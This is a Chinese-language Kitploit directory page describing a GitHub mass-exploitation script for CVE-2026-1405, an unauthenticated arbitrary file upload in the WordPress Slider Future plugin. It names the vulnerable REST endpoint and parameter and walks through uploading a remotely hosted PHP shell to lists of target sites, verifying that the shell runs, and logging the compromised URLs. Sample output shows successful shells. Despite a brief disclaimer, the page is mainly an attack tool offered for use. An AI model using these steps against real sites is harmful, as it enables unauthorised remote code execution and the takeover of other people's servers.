Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 - 未经身份验证的任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-1405
Payload生成漏洞利用脚本与自动化Web应用程序漏洞利用渗透测试红队
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 - 未经身份验证的任意文件上传

查看仓库
4116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1405

Slider Future <= 1.0.5 - 未认证任意文件上传

🚀 CVE-2026-1405.py — Slider Future 批量利用工具

🩸 漏洞概述

组件: Slider Future(WordPress 插件)
受影响版本: ≤ 1.0.5
漏洞类型: 未认证任意文件上传
CVE: CVE-2026-1405
CVSS 评分: 9.8(严重)

WordPress 的 Slider Future 插件在所有版本(包括 1.0.5)中,由于 slider_future_handle_image_upload 函数缺少文件类型验证,因此存在任意文件上传漏洞。这使得未认证攻击者能够将任何文件类型(包括恶意 PHP shell)直接上传到受影响服务器,从而实现远程代码执行。


⚡ 利用特性

  • 支持对多个目标进行批量利用。
  • 使用存在漏洞的端点:/wp-json/slider-future/v1/upload-image/
  • 通过 image_url 参数上传远程 PHP shell(无需认证)。
  • 通过检查用户自定义签名自动验证 shell 是否执行成功。

🛠️ 使用说明

1. 准备一个包含目标 WordPress 站点的文本文件(每行一个):

root@kitploit:~
http://example1.com
https://example2.com
...

2. 在线托管您的 PHP shell,并准备好其直接 URL。

示例:http://yourserver.com/shell.php

3. 运行脚本:

root@kitploit:~
python3 CVE-2026-1405.py

脚本会提示您输入以下内容:

  • 目标文件: 目标列表的路径(默认:list.txt)
  • Shell 直接 URL: 您希望上传到目标的在线可访问 shell
  • Shell 签名: shell 中用于验证的唯一字符串(例如 Nxploited)
  • 线程数: 并行线程数量(默认:10)

4. 输出

  • 利用结果会在由 Rich 驱动的专业界面中实时显示。
  • 成功的目标及 shell URL 会自动保存到 success_results.txt。

📝 脚本详情

  • 名称: CVE-2026-1405.py
  • 作者: Nxploited
  • 语言: Python 3
  • 依赖库: requests、rich

工作原理

  1. 向每个目标的存在漏洞端点发送 POST 请求:
    • URL: /wp-json/slider-future/v1/upload-image/
    • 参数: 指向您 shell 的 image_url。
  2. 解析 JSON 响应以提取上传后的 shell URL。
  3. 访问该 shell URL 并搜索您的签名字符串。
  4. 显示每个目标的状态:成功或失败。

⚠️ 法律免责声明

此工具仅用于教育和授权安全测试目的。
未经授权使用本工具来测试您不拥有或未经明确许可的网站属于违法行为。


💡 示例输出

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
下载工具